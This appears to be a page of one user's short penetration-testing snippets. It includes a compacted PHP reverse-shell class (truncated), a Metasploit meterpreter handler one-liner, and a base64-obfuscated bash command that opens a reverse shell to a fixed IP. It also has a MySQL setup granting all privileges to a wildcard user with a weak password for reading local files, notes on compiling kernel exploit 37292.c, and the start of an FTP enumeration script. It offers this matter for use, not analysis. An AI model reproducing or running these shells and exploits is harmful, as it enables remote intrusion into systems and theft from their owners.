tanaka-geek

//<?php class Sh{private $a=null;private $p=null;private $os=null;private $sh=null;private $des=array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));private $b=1024;private $c=0;private $e=false;public function __construct($a,$p){$this->a=$a;$this->p=$p;}private function det(){$d=true;if(stripos(PHP_OS,'LINUX')!==false){$this->os='LINUX';$this->sh='/bin/sh';}else if(stripos(PHP_OS,'WIN32')!==false||stripos(PHP_OS,'WINNT')!==false||stripos(PHP_OS,'WINDOWS')!==false){$this->os='WINDOWS';$this->sh='cmd.exe';}else{$d=false;echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";}return $d;}private function daem(){$e=false;if(!function_exists('pcntl_fork')){echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";}else if(($pid=@pcntl_fork())<0){echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";}else if($pid>0){$e=true;echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";}else if(posix_setsid()<0){echo

tanaka-geek

You can run msfconsole without any hassle and just one liner!

sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_https; set LHOST 192.168.1.1; set LPORT 443; run"

Run meterpreter session in background mode.

tanaka-geek

common = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
ascii_letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
ascii_lowercase = 'abcdefghijklmnopqrstuvwxyz'
ascii_uppercase = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
digits = '0123456789'
hexdigits = '0123456789abcdefABCDEF'
octdigits = '01234567'
printable = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c'
punctuation = '!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
whitespace = ' \t\n\r\x0b\x0c'

tanaka-geek

mysql -u'root'
CREATE USER 'adminer'@'%' IDENTIFIED BY 'Passw0rd!';
GRANT ALL PRIVILEGES ON *.* TO 'adminer'@'%';
FLUSH PRIVILEGES;
create database adminer;
use adminer;
create table experiment(name varchar(255));
exit;

// check mysqli.allow_local_infile = 1 otherwise, can't read local files'

tanaka-geek

Type of compiler

In Kernel Exploitation Stage, Compiler do matter in fact.

They compile exploit to execute, and the system can excute it with specific compiler.

Changing some line in kernel exploit code in 37292.c for clang compiler, not gcc.

tanaka-geek

Python has an even looser definition of compiling, but still has a compiled layer in the form of Python byte code stored as ".pyc" files.

These pyc files tend to be much more easily reversible than Java and C# so unless the source has been obfuscated you can almost always retrieve the exact source code made to create the final executable.

file byte-compiled-program
byte-compiled-program: python 2.7 byte-compiled

$ python -i byte-compiled-program

tanaka-geek

# Tools
whois.com
socialmention.com
recon-ng (Kali Linux tool)
theharvester (Kali Linux tool)
Shodan search engine
Netcraft

# Dark Web Sites:
http://onion.city/

tanaka-geek

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUwLjQvNDQzIDA+JjE= | base64 -d | bash

tanaka-geek

#!/bin/bash

IP="192.168.1.1"
PORT=21
USER="anonymous"
PASSWD="whatever"
FTP_DIR="/home/ftp"

function Enumerate {
for i in `seq 1 16`;do # you can change seq if there's more services are running but usually < 16

tanaka-geek

/etc/group

user groups

/etc/host.conf

configuration file for resolver

/etc/resolv.conf